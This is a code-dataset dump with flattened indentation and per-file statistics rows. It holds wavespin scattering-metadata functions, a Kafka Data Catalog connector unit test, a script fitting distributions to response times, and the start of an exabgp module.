A Tensor of size `(C, max_order)`, specifying the center
frequency of the filter used at each order (padded with NaNs).
- `'sigma'` : tensor
A Tensor of size `(C, max_order)`, specifying the frequency
bandwidth of the filter used at each order (padded with NaNs).
- `'j'` : tensor
A Tensor of size `(C, max_order)`, specifying the dyadic scale
of the filter used at each order (padded with NaNs).
- `'is_cqt'` : tensor
A tensor of size `(C, max_order)`, specifying whether the filter
was constructed per Constant Q Transform (padded with NaNs).
- `'n'` : tensor
A Tensor of size `(C, max_order)`, specifying the indices of
the filters used at each order (padded with NaNs).
- `'key'` : list
The tuples indexing the corresponding scattering coefficient
in the non-vectorized output.
References
----------
This is a modification of
https://github.com/kymatio/kymatio/blob/master/kymatio/scattering1d/utils.py
Kymatio, (C) 2018-present. The Kymatio developers.
"""
sigma_low, xi1s, sigma1s, j1s, is_cqt1s, xi2s, sigma2s, j2s, is_cqt2s = \
calibrate_scattering_filters(J, Q, T, r_psi=r_psi, J_pad=J_pad)
log2_T = math.floor(math.log2(T))
meta = {}
meta['order'] = [[], [], []]
meta['xi'] = [[], [], []]
meta['sigma'] = [[], [], []]
meta['j'] = [[], [], []]
meta['is_cqt'] = [[], [], []]
meta['n'] = [[], [], []]
meta['key'] = [[], [], []]
meta['order'][0].append(0)
meta['xi'][0].append((0,))
meta['sigma'][0].append((sigma_low,))
meta['j'][0].append((log2_T,))
meta['is_cqt'][0].append(())
meta['n'][0].append(())
meta['key'][0].append(())
for (n1, (xi1, sigma1, j1, is_cqt1)
) in enumerate(zip(xi1s, sigma1s, j1s, is_cqt1s)):
meta['order'][1].append(1)
meta['xi'][1].append((xi1,))
meta['sigma'][1].append((sigma1,))
meta['j'][1].append((j1,))
meta['is_cqt'][1].append((is_cqt1,))
meta['n'][1].append((n1,))
meta['key'][1].append((n1,))
if max_order < 2:
continue
for (n2, (xi2, sigma2, j2, is_cqt2)
) in enumerate(zip(xi2s, sigma2s, j2s, is_cqt2s)):
if j2 > j1:
meta['order'][2].append(2)
meta['xi'][2].append((xi1, xi2))
meta['sigma'][2].append((sigma1, sigma2))
meta['j'][2].append((j1, j2))
meta['is_cqt'][2].append((is_cqt1, is_cqt2))
meta['n'][2].append((n1, n2))
meta['key'][2].append((n1, n2))
for field, value in meta.items():
meta[field] = value[0] + value[1] + value[2]
pad_fields = ['xi', 'sigma', 'j', 'is_cqt', 'n']
pad_len = max_order
for field in pad_fields:
meta[field] = [x + (math.nan,) * (pad_len - len(x)) for x in meta[field]]
array_fields = ['order', 'xi', 'sigma', 'j', 'is_cqt', 'n']
for field in array_fields:
meta[field] = np.array(meta[field])
return meta
def compute_meta_jtfs(J_pad, J, Q, T, r_psi, sigma0, average, average_global,
average_global_phi, oversampling, out_exclude,
paths_exclude, scf):
"""Get metadata on the Joint Time-Frequency Scattering transform.
This information specifies the content of each scattering coefficient,
which order, which frequencies, which filters were used, and so on.
See below for more info.
Parameters
----------
J_pad : int
2**J_pad == amount of temporal padding.
J, Q, J_fr, T, F: int, int, int, int, int
See `help(wavespin.scattering1d.TimeFrequencyScattering1D)`.
Control physical meta of bandpass and lowpass filters (xi, sigma, etc).
out_3D : bool
- True: will reshape meta fields to match output structure:
`(n_coeffs, n_freqs, meta_len)`.
- False: pack flattened: `(n_coeffs * n_freqs, meta_len)`.
out_type : str
- `'dict:list'` or `'dict:array'`: meta is packed
into respective pairs (e.g. `meta['n']['psi_t * phi_f'][1]`)
- `'list'` or `'array'`: meta is flattened (e.g. `meta['n'][15]`).
out_exclude : list/tuple[str]
Names of coefficient pairs to exclude from meta.
sampling_filters_fr : tuple[str]
See `help(TimeFrequencyScattering1D)`. Affects `xi`, `sigma`, and `j`.
average : bool
Affects `S0`'s meta, and temporal stride meta.
average_global : bool
Affects `S0`'s meta, and temporal stride meta.
average_global_phi : bool
Affects joint temporal stride meta.
oversampling : int
Affects temporal stride meta.
scf : `scattering1d.frontend.base_frontend._FrequencyScatteringBase`
Frequential scattering object, storing pertinent attributes and filters.
Returns
-------
meta : dictionary
A dictionary with the following keys:
- `'order`' : tensor
A Tensor of length `C`, the total number of scattering
coefficients, specifying the scattering order.
- `'xi'` : tensor
A Tensor of size `(C, 3)`, specifying the center
frequency of the filter used at each order (padded with NaNs).
- `'sigma'` : tensor
A Tensor of size `(C, 3)`, specifying the frequency
bandwidth of the filter used at each order (padded with NaNs).
- `'j'` : tensor
A Tensor of size `(C, 3)`, specifying the dyadic scale
of the filter used at each order (padded with NaNs), excluding
lowpass filtering (unless it was the only filtering).
- `'is_cqt'` : tensor
A tensor of size `(C, max_order)`, specifying whether the filter
was constructed per Constant Q Transform (padded with NaNs).
- `'n'` : tensor
A Tensor of size `(C, 3)`, specifying the indices of
the filters used at each order (padded with NaNs).
Lowpass filters in `phi_*` pairs are denoted via `-1`.
- `'s'` : tensor
A Tensor of length `C`, specifying the spin of
each frequency scattering filter (+1=up, -1=down, 0=none).
- `'stride'` : tensor
A Tensor of size `(C, 2)`, specifying the total temporal and
frequential convolutional stride (i.e. subsampling) of resulting
coefficient (including lowpass filtering).
- `'key'` : list
The tuples indexing the corresponding scattering coefficient
in the non-vectorized output.
In case of `out_3D=True`, for joint pairs, will reshape each field into
`(n_coeffs, C, meta_len)`, where `n_coeffs` is the number of joint slices
in the pair, and `meta_len` is the existing `shape[-1]` (1, 2, or 3).
Computation and Structure
-------------------------
Computation replicates logic in `timefrequency_scattering1d()`. Meta values
depend on:
- out_3D (True only possible with `average and average_fr`)
- aligned
- sampling_psi_fr
- sampling_phi_fr
- average
- average_global
- average_global_phi
- average_fr
- average_fr_global
- average_fr_global_phi
- oversampling
- oversampling_fr
- max_pad_factor_fr (mainly via `unrestricted_pad_fr`)
- max_noncqt_fr
- out_exclude
- paths_exclude
and some of their interactions. Listed are only "unobvious" parameters;
anything that controls the filterbanks will change meta (`J`, `Q`, etc).
"""
def _get_compute_params(n2, n1_fr):
"""Reproduce exact logic in `timefrequency_scattering1d.py`."""
# basics
scale_diff = scf.scale_diffs[n2]
J_pad_fr = scf.J_pad_frs[scale_diff]
N_fr_padded = 2**J_pad_fr
# n1_fr_subsample, lowpass_subsample_fr ##############################
global_averaged_fr = (scf.average_fr_global if n1_fr != -1 else
scf.average_fr_global_phi)
if n2 == -1 and n1_fr == -1:
lowpass_subsample_fr = 0
if scf.average_fr_global_phi:
n1_fr_subsample = scf.log2_F
log2_F_phi = scf.log2_F
log2_F_phi_diff = 0
else:
log2_F_phi = scf.log2_F_phis['phi'][scale_diff]
log2_F_phi_diff = scf.log2_F_phi_diffs['phi'][scale_diff]
n1_fr_subsample = max(scf.n1_fr_subsamples['phi'][scale_diff] -
scf.oversampling_fr, 0)
elif n1_fr == -1:
lowpass_subsample_fr = 0
if scf.average_fr_global_phi:
total_conv_stride_over_U1_phi = min(J_pad_fr, scf.log2_F)
n1_fr_subsample = total_conv_stride_over_U1_phi
log2_F_phi = scf.log2_F
log2_F_phi_diff = 0
else:
n1_fr_subsample = max(scf.n1_fr_subsamples['phi'][scale_diff] -
scf.oversampling_fr, 0)
log2_F_phi = scf.log2_F_phis['phi'][scale_diff]
log2_F_phi_diff = scf.log2_F_phi_diffs['phi'][scale_diff]
else:
total_conv_stride_over_U1 = (
scf.total_conv_stride_over_U1s[scale_diff][n1_fr])
n1_fr_subsample = max(scf.n1_fr_subsamples['spinned'
][scale_diff][n1_fr] -
scf.oversampling_fr, 0)
log2_F_phi = scf.log2_F_phis['spinned'][scale_diff][n1_fr]
log2_F_phi_diff = scf.log2_F_phi_diffs['spinned'][scale_diff][n1_fr]
if global_averaged_fr:
lowpass_subsample_fr = (total_conv_stride_over_U1 -
n1_fr_subsample)
elif scf.average_fr:
lowpass_subsample_fr = max(total_conv_stride_over_U1 -
n1_fr_subsample -
scf.oversampling_fr, 0)
else:
lowpass_subsample_fr = 0
# total stride, unpadding ############################################
total_conv_stride_over_U1_realized = (n1_fr_subsample +
lowpass_subsample_fr)
if scf.out_3D:
stride_ref = scf.total_conv_stride_over_U1s[0][0]
stride_ref = max(stride_ref - scf.oversampling_fr, 0)
ind_start_fr = scf.ind_start_fr_max[stride_ref]
ind_end_fr = scf.ind_end_fr_max[ stride_ref]
else:
_stride = total_conv_stride_over_U1_realized
ind_start_fr = scf.ind_start_fr[n2][_stride]
ind_end_fr = scf.ind_end_fr[ n2][_stride]
return (N_fr_padded, total_conv_stride_over_U1_realized,
n1_fr_subsample, scale_diff, log2_F_phi_diff, log2_F_phi,
ind_start_fr, ind_end_fr, global_averaged_fr)
def _get_fr_params(n1_fr, scale_diff, log2_F_phi_diff, log2_F_phi):
if n1_fr != -1:
# spinned
psi_id = scf.psi_ids[scale_diff]
p = [scf.psi1_f_fr_up[field][psi_id][n1_fr]
for field in ('xi', 'sigma', 'j', 'is_cqt')]
else:
# phi_f
if not scf.average_fr_global:
F_phi = scf.F / 2**log2_F_phi_diff
p = (0., sigma0 / F_phi, log2_F_phi, nan)
else:
p = (0., sigma0 / 2**log2_F_phi, log2_F_phi, nan)
xi1_fr, sigma1_fr, j1_fr, is_cqt1_fr = p
return xi1_fr, sigma1_fr, j1_fr, is_cqt1_fr
def _exclude_excess_scale(n2, n1_fr):
scale_diff = scf.scale_diffs[n2]
psi_id = scf.psi_ids[scale_diff]
j1_frs = scf.psi1_f_fr_up['j'][psi_id]
return bool(n1_fr > len(j1_frs) - 1)
def _skip_path(n2, n1_fr):
excess_scale = bool(scf.sampling_psi_fr == 'exclude' and
_exclude_excess_scale(n2, n1_fr))
user_skip_path = bool(n2 in paths_exclude.get('n2', {}) or
n1_fr in paths_exclude.get('n1_fr', {}))
return excess_scale or user_skip_path
def _fill_n1_info(pair, n2, n1_fr, spin):
if _skip_path(n2, n1_fr):
return
# track S1 from padding to `_joint_lowpass()`
(N_fr_padded, total_conv_stride_over_U1_realized, n1_fr_subsample,
scale_diff, log2_F_phi_diff, log2_F_phi, ind_start_fr, ind_end_fr,
global_averaged_fr) = _get_compute_params(n2, n1_fr)
# fetch xi, sigma for n2, n1_fr
if n2 != -1:
xi2, sigma2, j2, is_cqt2 = (xi2s[n2], sigma2s[n2], j2s[n2],
is_cqt2s[n2])
else:
xi2, sigma2, j2, is_cqt2 = 0., sigma_low, log2_T, nan
xi1_fr, sigma1_fr, j1_fr, is_cqt1_fr = _get_fr_params(
n1_fr, scale_diff, log2_F_phi_diff, log2_F_phi)
# get temporal stride info
global_averaged = (average_global if n2 != -1 else
average_global_phi)
if global_averaged:
total_conv_stride_tm = log2_T
else:
k1_plus_k2 = max(min(j2, log2_T) - oversampling, 0)
if average:
k2_tm_J = max(log2_T - k1_plus_k2 - oversampling, 0)
total_conv_stride_tm = k1_plus_k2 + k2_tm_J
else:
total_conv_stride_tm = k1_plus_k2
stride = (total_conv_stride_over_U1_realized, total_conv_stride_tm)
# distinguish between `key` and `n`
n1_fr_n = n1_fr if (n1_fr != -1) else inf
n1_fr_key = n1_fr if (n1_fr != -1) else 0
n2_n = n2 if (n2 != -1) else inf
n2_key = n2 if (n2 != -1) else 0
# global average pooling, all S1 collapsed into single point
if global_averaged_fr:
meta['order' ][pair].append(2)
meta['xi' ][pair].append((xi2, xi1_fr, nan))
meta['sigma' ][pair].append((sigma2, sigma1_fr, nan))
meta['j' ][pair].append((j2, j1_fr, nan))
meta['is_cqt'][pair].append((is_cqt2, is_cqt1_fr, nan))
meta['n' ][pair].append((n2_n, n1_fr_n, nan))
meta['s' ][pair].append((spin,))
meta['stride'][pair].append(stride)
meta['key' ][pair].append((n2_key, n1_fr_key, 0))
return
fr_max = scf.N_frs[n2] if (n2 != -1) else len(xi1s)
# simulate subsampling
n1_step = 2 ** total_conv_stride_over_U1_realized
for n1 in range(0, N_fr_padded, n1_step):
# simulate unpadding
if n1 / n1_step < ind_start_fr:
continue
elif n1 / n1_step >= ind_end_fr:
break
if n1 >= fr_max: # equivalently `j1 > j2`
# these are padded rows, no associated filters
xi1, sigma1, j1, is_cqt1 = nan, nan, nan, nan
else:
xi1, sigma1, j1, is_cqt1 = (xi1s[n1], sigma1s[n1], j1s[n1],
is_cqt1s[n1])
meta['order' ][pair].append(2)
meta['xi' ][pair].append((xi2, xi1_fr, xi1))
meta['sigma' ][pair].append((sigma2, sigma1_fr, sigma1))
meta['j' ][pair].append((j2, j1_fr, j1))
meta['is_cqt'][pair].append((is_cqt2, is_cqt1_fr, is_cqt1))
meta['n' ][pair].append((n2_n, n1_fr_n, n1))
meta['s' ][pair].append((spin,))
meta['stride'][pair].append(stride)
meta['key' ][pair].append((n2_key, n1_fr_key, n1))
# set params
log2_T = math.floor(math.log2(T))
log2_F = math.floor(math.log2(scf.F))
# extract filter meta
sigma_low, xi1s, sigma1s, j1s, is_cqt1s, xi2s, sigma2s, j2s, is_cqt2s = \
calibrate_scattering_filters(J, Q, T, J_pad=J_pad, r_psi=r_psi)
j1_frs = scf.psi1_f_fr_up['j']
# fetch phi meta; must access `phi_f_fr` as `j1s_fr` requires sampling phi
meta_phi = {}
for field in ('xi', 'sigma', 'j'):
meta_phi[field] = {}
for k in scf.phi_f_fr[field]:
meta_phi[field][k] = scf.phi_f_fr[field][k]
xi1s_fr_phi, sigma1_fr_phi, j1s_fr_phi = list(meta_phi.values())
meta = {}
inf = -1 # placeholder for infinity
nan = math.nan
coef_names = (
'S0', # (time) zeroth order
'S1', # (time) first order
'phi_t * phi_f', # (joint) joint lowpass
'phi_t * psi_f', # (joint) time lowpass
'psi_t * phi_f', # (joint) freq lowpass
'psi_t * psi_f_up', # (joint) spin up
'psi_t * psi_f_dn', # (joint) spin down
)
for field in ('order', 'xi', 'sigma', 'j', 'is_cqt', 'n', 's', 'stride',
'key'):
meta[field] = {name: [] for name in coef_names}
# Zeroth-order ###########################################################
if average_global:
k0 = log2_T
elif average:
k0 = max(log2_T - oversampling, 0)
meta['order' ]['S0'].append(0)
meta['xi' ]['S0'].append((nan, nan, 0. if average else nan))
meta['sigma' ]['S0'].append((nan, nan, sigma_low if average else nan))
meta['j' ]['S0'].append((nan, nan, log2_T if average else nan))
meta['is_cqt']['S0'].append((nan, nan, nan))
meta['n' ]['S0'].append((nan, nan, inf if average else nan))
meta['s' ]['S0'].append((nan,))
meta['stride']['S0'].append((nan, k0 if average else nan))
meta['key' ]['S0'].append((0, 0, 0))
# First-order ############################################################
def stride_S1(j1):
sub1_adj = min(j1, log2_T) if average else j1
k1 = max(sub1_adj - oversampling, 0)
k1_J = max(log2_T - k1 - oversampling, 0)
if average_global:
total_conv_stride_tm = log2_T
elif average:
total_conv_stride_tm = k1 + k1_J
else:
total_conv_stride_tm = k1
return total_conv_stride_tm
for (n1, (xi1, sigma1, j1, is_cqt1)
) in enumerate(zip(xi1s, sigma1s, j1s, is_cqt1s)):
meta['order' ]['S1'].append(1)
meta['xi' ]['S1'].append((nan, nan, xi1))
meta['sigma' ]['S1'].append((nan, nan, sigma1))
meta['j' ]['S1'].append((nan, nan, j1))
meta['is_cqt']['S1'].append((nan, nan, is_cqt1))
meta['n' ]['S1'].append((nan, nan, n1))
meta['s' ]['S1'].append((nan,))
meta['stride']['S1'].append((nan, stride_S1(j1)))
meta['key' ]['S1'].append((0, 0, n1))
S1_len = len(meta['n']['S1'])
assert S1_len >= scf.N_frs_max, (S1_len, scf.N_frs_max)
# Joint scattering #######################################################
# `phi_t * phi_f` coeffs
_fill_n1_info('phi_t * phi_f', n2=-1, n1_fr=-1, spin=0)
# `phi_t * psi_f` coeffs
for n1_fr in range(len(j1_frs[0])):
_fill_n1_info('phi_t * psi_f', n2=-1, n1_fr=n1_fr, spin=0)
# `psi_t * phi_f` coeffs
for n2, j2 in enumerate(j2s):
if j2 == 0:
continue
_fill_n1_info('psi_t * phi_f', n2, n1_fr=-1, spin=0)
# `psi_t * psi_f` coeffs
for spin in (1, -1):
pair = ('psi_t * psi_f_up' if spin == 1 else
'psi_t * psi_f_dn')
for n2, j2 in enumerate(j2s):
if j2 == 0:
continue
psi_id = scf.psi_ids[scf.scale_diffs[n2]]
for n1_fr, j1_fr in enumerate(j1_frs[psi_id]):
_fill_n1_info(pair, n2, n1_fr, spin=spin)
array_fields = ['order', 'xi', 'sigma', 'j', 'is_cqt', 'n', 's', 'stride',
'key']
for field in array_fields:
for pair, v in meta[field].items():
meta[field][pair] = np.array(v)
if scf.out_3D:
# reorder for 3D
for field in array_fields:
# meta_len
if field in ('s', 'order'):
meta_len = 1
elif field == 'stride':
meta_len = 2
else:
meta_len = 3
for pair in meta[field]:
# number of n2s
if pair.startswith('phi_t'):
n_n2s = 1
else:
n_n2s = sum((j2 != 0 and n2 not in paths_exclude.get('n2', {}))
for n2, j2 in enumerate(j2s))
# number of n1_frs; n_slices
n_slices = None
if pair in ('S0', 'S1'):
# simply expand dim for consistency, no 3D structure
meta[field][pair] = meta[field][pair].reshape(-1, 1, meta_len)
continue
elif 'psi_f' in pair:
if pair.startswith('phi_t'):
n_slices = sum(not _skip_path(n2=-1, n1_fr=n1_fr)
for n1_fr in range(len(j1_frs[0])))
else:
n_slices = sum(not _skip_path(n2=n2, n1_fr=n1_fr)
for n2, j2 in enumerate(j2s)
for n1_fr in range(len(j1_frs[0]))
if j2 != 0)
elif 'phi_f' in pair:
n_n1_frs = 1
# n_slices
if n_slices is None:
n_slices = n_n2s * n_n1_frs
# reshape meta
meta[field][pair] = meta[field][pair].reshape(n_slices, -1, meta_len)
if out_exclude is not None:
# drop excluded pairs
for pair in out_exclude:
for field in meta:
del meta[field][pair]
# ensure time / freq stride doesn't exceed log2_T / log2_F in averaged cases,
# and J / J_fr in unaveraged
smax_t_nophi = log2_T if average else max(J)
if scf.average_fr:
if not scf.out_3D and not scf.aligned:
# see "Compute logic: stride, padding" in `core`
smax_f_nophi = max(scf.log2_F, scf.J_fr)
else:
smax_f_nophi = scf.log2_F
else:
smax_f_nophi = scf.J_fr
for pair in meta['stride']:
if pair == 'S0' and not average:
continue
stride_max_t = (smax_t_nophi if ('phi_t' not in pair) else
log2_T)
stride_max_f = (smax_f_nophi if ('phi_f' not in pair) else
log2_F)
for i, s in enumerate(meta['stride'][pair][..., 1].ravel()):
assert s <= stride_max_t, ("meta['stride'][{}][{}] > stride_max_t "
"({} > {})").format(pair, i, s,
stride_max_t)
if pair in ('S0', 'S1'):
continue
for i, s in enumerate(meta['stride'][pair][..., 0].ravel()):
assert s <= stride_max_f, ("meta['stride'][{}][{}] > stride_max_f "
"({} > {})").format(pair, i, s,
stride_max_f)
if not scf.out_type.startswith('dict'):
# join pairs
if not scf.out_3D:
meta_flat = {f: np.concatenate([v for v in meta[f].values()], axis=0)
for f in meta}
else:
meta_flat0 = {f: np.concatenate(
[v for k, v in meta[f].items() if k in ('S0', 'S1')],
axis=0) for f in meta}
meta_flat1 = {f: np.concatenate(
[v for k, v in meta[f].items() if k not in ('S0', 'S1')],
axis=0) for f in meta}
meta_flat = (meta_flat0, meta_flat1)
meta = meta_flat
return meta
| 40.427381 | 83 | 0.55835 | 4,612 | 33,959 | 3.897225 | 0.116002 | 0.013353 | 0.011127 | 0.011684 | 0.430288 | 0.375932 | 0.324858 | 0.284077 | 0.261878 | 0.24324 | 0 | 0.033003 | 0.317412 | 33,959 | 839 | 84 | 40.475566 | 0.742407 | 0.367149 | 0 | 0.244706 | 0 | 0 | 0.040882 | 0.002186 | 0 | 0 | 0 | 0 | 0.007059 | 1 | 0.025882 | false | 0.014118 | 0.007059 | 0 | 0.061176 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e77bc1533880b4a66753674e008ece8b99afe6f5 | 3,959 | py | Python | google-datacatalog-kafka-connector/tests/google/datacatalog_connectors/kafka/prepare/assembled_entry_factory_test.py | bonifacyj/datacatalog-connectors-message-brokers | 0f72c800ebf1e570b638a0ad930d48e9dc44a25e | [
"Apache-2.0"
] | 1 | 2021-04-30T22:52:41.000Z | 2021-04-30T22:52:41.000Z | google-datacatalog-kafka-connector/tests/google/datacatalog_connectors/kafka/prepare/assembled_entry_factory_test.py | bonifacyj/datacatalog-connectors-message-brokers | 0f72c800ebf1e570b638a0ad930d48e9dc44a25e | [
"Apache-2.0"
] | 2 | 2020-10-01T14:24:12.000Z | 2020-11-12T16:40:01.000Z | google-datacatalog-kafka-connector/tests/google/datacatalog_connectors/kafka/prepare/assembled_entry_factory_test.py | bonifacyj/datacatalog-connectors-message-brokers | 0f72c800ebf1e570b638a0ad930d48e9dc44a25e | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/python
#
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import unittest
import mock
from google.datacatalog_connectors.commons_test import utils
from google.datacatalog_connectors.kafka import prepare
from google.datacatalog_connectors.kafka.config.\
metadata_constants import MetadataConstants
from .. import test_utils
@mock.patch('google.cloud.datacatalog_v1beta1.DataCatalogClient.entry_path')
class AssembledEntryFactoryTestCase(unittest.TestCase):
__PROJECT_ID = 'test_project'
__LOCATION_ID = 'location_id'
__ENTRY_GROUP_ID = 'kafka'
__MOCKED_ENTRY_PATH = 'mocked_entry_path'
__METADATA_SERVER_HOST = 'metadata_host'
__MODULE_PATH = os.path.dirname(os.path.abspath(__file__))
__PREPARE_PACKAGE = 'google.datacatalog_connectors.kafka.prepare'
def setUp(self):
entry_factory = test_utils.FakeDataCatalogEntryFactory(
self.__PROJECT_ID, self.__LOCATION_ID, self.__METADATA_SERVER_HOST,
self.__ENTRY_GROUP_ID)
tag_factory = prepare.DataCatalogTagFactory()
self.__assembled_entry_factory = prepare.assembled_entry_factory. \
AssembledEntryFactory(
AssembledEntryFactoryTestCase.__ENTRY_GROUP_ID,
entry_factory, tag_factory)
tag_templates = {
'kafka_cluster_metadata': {},
'kafka_topic_metadata': {}
}
self.__assembled_entry_factory_with_tag_template = prepare.\
assembled_entry_factory.AssembledEntryFactory(
AssembledEntryFactoryTestCase.__ENTRY_GROUP_ID,
entry_factory, tag_factory, tag_templates)
def test_dc_entries_should_be_created_from_cluster_metadata(
self, entry_path):
entry_path.return_value = \
AssembledEntryFactoryTestCase.__MOCKED_ENTRY_PATH
metadata = utils.Utils.convert_json_to_object(self.__MODULE_PATH,
'test_metadata.json')
assembled_entries = self.__assembled_entry_factory.\
make_entries_from_cluster_metadata(metadata)
num_topics = len(metadata[MetadataConstants.TOPICS])
num_clusters = 1
self.assertEqual(num_topics + num_clusters, len(assembled_entries))
@mock.patch('{}.'.format(__PREPARE_PACKAGE) + 'datacatalog_tag_factory.' +
'DataCatalogTagFactory.make_tag_for_cluster')
@mock.patch('{}.datacatalog_tag_factory.'.format(__PREPARE_PACKAGE) +
'DataCatalogTagFactory.make_tag_for_topic')
def test_with_tag_templates_should_be_converted_to_dc_entries_with_tags(
self, make_tag_for_topic, make_tag_for_cluster, entry_path):
entry_path.return_value = \
AssembledEntryFactoryTestCase.__MOCKED_ENTRY_PATH
entry_factory = \
self.__assembled_entry_factory_with_tag_template
cluster_metadata = utils.Utils.convert_json_to_object(
self.__MODULE_PATH, 'test_metadata.json')
num_topics = len(cluster_metadata[MetadataConstants.TOPICS])
prepared_entries = \
entry_factory. \
make_entries_from_cluster_metadata(
cluster_metadata)
for entry in prepared_entries:
self.assertEqual(1, len(entry.tags))
self.assertEqual(num_topics, make_tag_for_topic.call_count)
self.assertEqual(1, make_tag_for_cluster.call_count)
| 42.569892 | 79 | 0.717605 | 446 | 3,959 | 5.914798 | 0.309417 | 0.050038 | 0.047763 | 0.037908 | 0.289613 | 0.26232 | 0.26232 | 0.200152 | 0.200152 | 0.200152 | 0 | 0.004167 | 0.211922 | 3,959 | 92 | 80 | 43.032609 | 0.841346 | 0.142713 | 0 | 0.090909 | 0 | 0 | 0.111276 | 0.07665 | 0 | 0 | 0 | 0 | 0.060606 | 1 | 0.045455 | false | 0 | 0.106061 | 0 | 0.272727 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e77e4dc700080418326c39439db7328ed34301f1 | 3,351 | py | Python | miscellaneous_server_test/time_distribution/time_distribution.py | gellens/Master_thesis_JAQ_code | 034de9d7883c0d81564f975405c8985aa4b4d428 | [
"MIT"
] | null | null | null | miscellaneous_server_test/time_distribution/time_distribution.py | gellens/Master_thesis_JAQ_code | 034de9d7883c0d81564f975405c8985aa4b4d428 | [
"MIT"
] | null | null | null | miscellaneous_server_test/time_distribution/time_distribution.py | gellens/Master_thesis_JAQ_code | 034de9d7883c0d81564f975405c8985aa4b4d428 | [
"MIT"
] | 1 | 2020-03-05T14:09:01.000Z | 2020-03-05T14:09:01.000Z | # import matplotlib
# import statsmodels as sm
# import scipy.stats as st
# import pandas as pd
# import warnings
import json
import os
from scipy.stats import gamma
from scipy.stats import lognorm
from scipy.stats import pareto
from scipy.stats import norm
import numpy as np
import matplotlib.pyplot as plt
def warmup_filter(d):
warm_up_measures = 2
return d[warm_up_measures:]
def load_data():
base_path = "./data"
data_files_path = [os.path.join(base_path, f) for f in os.listdir(base_path) if os.path.isfile(os.path.join(base_path, f))]
data_merged = []
for f_path in data_files_path:
with open(f_path) as f:
data = json.load(f) # add a filter for the 2 first
data_merged += warmup_filter(data)
return data_merged
def compute_sse(times, d, arg, loc, scale):
# source: https://stackoverflow.com/questions/6620471/fitting-empirical-distribution-to-theoretical-ones-with-scipy-python
BINS = 50 # number of bar in the histogram
y, x = np.histogram(times, bins=BINS, density=True)
x = (x + np.roll(x, -1))[:-1] / 2.0 # x is now the value in the center of the bar
# Calculate fitted PDF and error with fit in distribution
pdf = d.pdf(x, *arg, loc=loc, scale=scale)
sse = np.sum(np.power(y - pdf, 2.0))
return sse
def fit_distributions(times):
cut_off = 500
distribution = {
"Gamma": gamma,
"Lognormal": lognorm,
"Pareto": pareto,
"Nomal": norm
}
fig, ax = plt.subplots(1, 1)
best_sse = 1 # worse value possible in our case
best_d = None
best_d_str = None
best_arg = []
best_loc = None
best_scale = None
for d_str, d in distribution.items():
params = d.fit(times, scale=10)
# Separate parts of parameters
arg = params[:-2]
loc = params[-2]
scale = params[-1]
# check if better sse
sse = compute_sse(times, d, arg, loc, scale)
if sse < best_sse:
best_sse = sse
best_d = d
best_d_str = d_str
best_arg = arg
best_loc = loc
best_scale = scale
# plot the distribution
x = np.linspace(d.ppf(0.001, *arg, loc=loc, scale=scale),
d.ppf(0.99, *arg, loc=loc, scale=scale), 200)
ax.plot(x, d.pdf(x, *arg, loc=loc, scale=scale), '-', lw=2, alpha=0.6, label=d_str+' pdf')
# source clip: https://stackoverflow.com/questions/26218704/matplotlib-histogram-with-collection-bin-for-high-values
ax.hist(np.clip(times, 0, cut_off), 50, density=True, histtype='stepfilled', alpha=0.2)
ax.legend(loc='best', frameon=False)
plt.xlabel('Response time')
plt.ylabel('Probability density')
plt.title('Distribution of response times')
plt.show()
print("The best distribution is the "+best_d_str+ (" with argument: " + str(best_arg) if len(best_arg) > 0 else "")+" [loc: "+str(best_loc)+" scale: "+str(best_scale)+"]")
mean = best_d.mean(*best_arg, loc=best_loc, scale=best_scale)
var = best_d.var(*best_arg, loc=best_loc, scale=best_scale)
print("MODEL: Mean:", mean, "Variance:", var)
print("DATA : Mean:", np.mean(times), "Variance:", np.var(times))
def main():
times = load_data()
fit_distributions(times)
if __name__ == "__main__":
main()
| 31.027778 | 175 | 0.63026 | 504 | 3,351 | 4.05754 | 0.311508 | 0.035208 | 0.027384 | 0.03912 | 0.117359 | 0.098778 | 0.080196 | 0.05379 | 0 | 0 | 0 | 0.021662 | 0.242316 | 3,351 | 107 | 176 | 31.317757 | 0.783773 | 0.179946 | 0 | 0 | 0 | 0 | 0.081625 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.067568 | false | 0 | 0.108108 | 0 | 0.216216 | 0.040541 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e7808d26b562a5ddeb70cd3327c78d41fcdc891d | 1,113 | py | Python | lib/exabgp/bgp/message/update/attribute/community/extended/mac_mobility.py | cloudscale-ch/exabgp | 55ee496dfbc3fce75c5107fae7a7d38567154d46 | [
"BSD-3-Clause"
] | 1 | 2019-06-25T20:49:37.000Z | 2019-06-25T20:49:37.000Z | lib/exabgp/bgp/message/update/attribute/community/extended/mac_mobility.py | nembery/exabgp | 53cfff843ddde33bf1c437a1c4ce99de20c6bade | [
"BSD-3-Clause"
] | null | null | null | lib/exabgp/bgp/message/update/attribute/community/extended/mac_mobility.py | nembery/exabgp | 53cfff843ddde33bf1c437a1c4ce99de20c6bade | [
"BSD-3-Clause"
] | 1 | 2020-07-23T16:52:51.000Z | 2020-07-23T16:52:51.000Z | # encoding: utf-8
"""
mac_mobility.py
